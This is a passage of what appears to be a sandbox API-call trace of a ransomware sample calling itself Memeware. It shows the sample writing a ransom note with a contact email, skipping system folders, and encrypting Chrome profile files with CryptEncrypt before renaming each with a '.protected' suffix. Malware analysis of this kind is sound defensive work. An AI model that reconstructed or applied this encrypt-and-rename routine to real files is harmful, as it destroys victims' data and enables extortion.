(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.495] WriteFile (in: hFile=0x154, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e2d4*=0x2ac, lpOverlapped=0x0) returned 1 [0078.495] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.495] WriteFile (in: hFile=0x154, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e2d4*=0xb1, lpOverlapped=0x0) returned 1 [0078.495] CloseHandle (hObject=0x154) returned 1 [0078.496] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0078.496] lstrcmpiW (lpString1="Extension State", lpString2="Windows") returned -1 [0078.496] lstrcmpiW (lpString1="Extension State", lpString2="Program Files") returned -1 [0078.496] lstrcmpiW (lpString1="Extension State", lpString2="Program Files (x86)") returned -1 [0078.496] lstrcmpiW (lpString1="Extension State", lpString2="$Recycle.bin") returned 1 [0078.496] lstrcmpiW (lpString1="Extension State", lpString2="System Volume Information") returned -1 [0078.496] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State") returned 95 [0078.496] lstrcmpW (lpString1="Extension State", lpString2=".") returned 1 [0078.496] lstrcmpW (lpString1="Extension State", lpString2="..") returned 1 [0078.496] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\*") returned 97 [0078.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extension State\\*", lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 0x47bb10 [0078.505] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.505] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.505] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.505] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.505] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.505] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\.") returned 97 [0078.505] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.505] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.505] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.505] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.505] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.505] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.505] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.505] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\..") returned 98 [0078.505] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.505] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.505] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.506] lstrcmpiW (lpString1="000003.log", lpString2="Windows") returned -1 [0078.506] lstrcmpiW (lpString1="000003.log", lpString2="Program Files") returned -1 [0078.506] lstrcmpiW (lpString1="000003.log", lpString2="Program Files 
(x86)") returned -1 [0078.506] lstrcmpiW (lpString1="000003.log", lpString2="$Recycle.bin") returned 1 [0078.506] lstrcmpiW (lpString1="000003.log", lpString2="System Volume Information") returned -1 [0078.506] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log") returned 106 [0078.506] StrStrIW (lpFirst="000003.log", lpSrch=".protected") returned 0x0 [0078.506] lstrcmpW (lpString1="000003.log", lpString2="RESTORE_FILES.txt") returned -1 [0078.506] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.506] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log") returned 106 [0078.506] StrStrW (lpFirst="000003.log", lpSrch=".txt") returned 0x0 [0078.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log") returned 106 [0078.506] StrStrW (lpFirst="000003.log", lpSrch=".rar") returned 0x0 [0078.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log") returned 106 
[0078.506] StrStrW (lpFirst="000003.log", lpSrch=".zip") returned 0x0 [0078.506] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x4ad, lpOverlapped=0x0) returned 1 [0078.516] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffb53, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.516] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x4ad, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x4ad, lpOverlapped=0x0) returned 1 [0078.516] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.516] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.517] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.517] CloseHandle (hObject=0x158) returned 1 [0078.517] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log.protected") returned 116 [0078.517] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extension State\\000003.log.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\000003.log.protected")) returned 1 [0078.517] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.517] lstrcmpiW (lpString1="CURRENT", lpString2="Windows") returned -1 [0078.518] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files") returned -1 [0078.518] lstrcmpiW (lpString1="CURRENT", lpString2="Program Files (x86)") returned -1 [0078.518] lstrcmpiW (lpString1="CURRENT", lpString2="$Recycle.bin") returned 1 [0078.518] lstrcmpiW (lpString1="CURRENT", lpString2="System Volume Information") returned -1 [0078.518] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT") returned 103 [0078.518] StrStrIW (lpFirst="CURRENT", lpSrch=".protected") returned 0x0 [0078.518] lstrcmpW (lpString1="CURRENT", lpString2="RESTORE_FILES.txt") returned -1 [0078.518] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.518] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.518] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extension State\\CURRENT") returned 103 [0078.518] StrStrW (lpFirst="CURRENT", lpSrch=".txt") returned 0x0 [0078.518] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT") returned 103 [0078.518] StrStrW (lpFirst="CURRENT", lpSrch=".rar") returned 0x0 [0078.518] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT") returned 103 [0078.518] StrStrW (lpFirst="CURRENT", lpSrch=".zip") returned 0x0 [0078.518] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0078.519] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.519] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x10, lpOverlapped=0x0) returned 1 [0078.519] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.519] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.519] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.520] CloseHandle (hObject=0x158) returned 1 [0078.520] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT.protected") returned 113 [0078.520] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\current"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\CURRENT.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\current.protected")) returned 1 [0078.520] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.520] lstrcmpiW (lpString1="LOCK", lpString2="Windows") returned -1 [0078.520] lstrcmpiW (lpString1="LOCK", lpString2="Program Files") returned -1 [0078.520] lstrcmpiW (lpString1="LOCK", lpString2="Program Files (x86)") returned -1 [0078.520] lstrcmpiW (lpString1="LOCK", lpString2="$Recycle.bin") returned 1 [0078.520] lstrcmpiW (lpString1="LOCK", lpString2="System Volume Information") returned -1 [0078.521] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK") returned 100 [0078.521] StrStrIW (lpFirst="LOCK", lpSrch=".protected") returned 0x0 [0078.521] lstrcmpW (lpString1="LOCK", lpString2="RESTORE_FILES.txt") returned -1 [0078.521] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.521] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.521] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\lock"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK") returned 100 [0078.521] StrStrW (lpFirst="LOCK", lpSrch=".txt") returned 0x0 [0078.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK") returned 100 [0078.521] StrStrW (lpFirst="LOCK", lpSrch=".rar") returned 0x0 [0078.521] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK") returned 100 [0078.521] StrStrW (lpFirst="LOCK", lpSrch=".zip") returned 0x0 [0078.521] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0078.521] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.521] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e2d4*=0x0, lpOverlapped=0x0) returned 1 [0078.521] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.521] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, 
lpOverlapped=0x0) returned 1 [0078.522] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.522] CloseHandle (hObject=0x158) returned 1 [0078.522] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK.protected") returned 110 [0078.522] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\lock"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOCK.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\lock.protected")) returned 1 [0078.523] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.523] lstrcmpiW (lpString1="LOG", lpString2="Windows") returned -1 [0078.523] lstrcmpiW (lpString1="LOG", lpString2="Program Files") returned -1 [0078.523] lstrcmpiW (lpString1="LOG", lpString2="Program Files (x86)") returned -1 [0078.523] lstrcmpiW (lpString1="LOG", lpString2="$Recycle.bin") returned 1 [0078.523] lstrcmpiW (lpString1="LOG", lpString2="System Volume Information") returned -1 [0078.523] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG") returned 99 [0078.523] StrStrIW (lpFirst="LOG", lpSrch=".protected") returned 0x0 [0078.523] lstrcmpW (lpString1="LOG", lpString2="RESTORE_FILES.txt") returned -1 
[0078.523] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.523] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.524] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG") returned 99 [0078.524] StrStrW (lpFirst="LOG", lpSrch=".txt") returned 0x0 [0078.524] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG") returned 99 [0078.524] StrStrW (lpFirst="LOG", lpSrch=".rar") returned 0x0 [0078.524] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG") returned 99 [0078.524] StrStrW (lpFirst="LOG", lpSrch=".zip") returned 0x0 [0078.524] ReadFile (in: hFile=0x158, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e2d4*=0x9a, lpOverlapped=0x0) returned 1 [0078.525] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffff66, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.525] WriteFile (in: hFile=0x158, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x9a, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, 
lpNumberOfBytesWritten=0x295e2d4*=0x9a, lpOverlapped=0x0) returned 1 [0078.525] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.525] WriteFile (in: hFile=0x158, lpBuffer=0x295e2ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x295e2ac*, lpNumberOfBytesWritten=0x295e2d4*=0x4, lpOverlapped=0x0) returned 1 [0078.525] WriteFile (in: hFile=0x158, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e2d4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e2d4*=0x30, lpOverlapped=0x0) returned 1 [0078.525] CloseHandle (hObject=0x158) returned 1 [0078.525] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.protected") returned 109 [0078.525] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\LOG.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\log.protected")) returned 1 [0078.526] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0078.526] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Windows") returned -1 [0078.526] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files") returned -1 [0078.526] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="Program Files (x86)") returned -1 [0078.526] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="$Recycle.bin") returned 
1 [0078.526] lstrcmpiW (lpString1="MANIFEST-000001", lpString2="System Volume Information") returned -1 [0078.526] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001") returned 111 [0078.526] StrStrIW (lpFirst="MANIFEST-000001", lpSrch=".protected") returned 0x0 [0078.526] lstrcmpW (lpString1="MANIFEST-000001", lpString2="RESTORE_FILES.txt") returned -1 [0078.526] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e28c | out: pbBuffer=0x295e28c) returned 1 [0078.526] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e2b4*=0x30) returned 1 [0078.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension state\\manifest-000001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0078.527] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001") returned 111 [0078.527] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".txt") returned 0x0 [0078.527] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001") returned 111 [0078.527] StrStrW (lpFirst="MANIFEST-000001", lpSrch=".rar") returned 0x0 [0078.527] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\MANIFEST-000001") returned 111 [0078.527] StrStrW (lpFirst="MANIFEST-000001", 
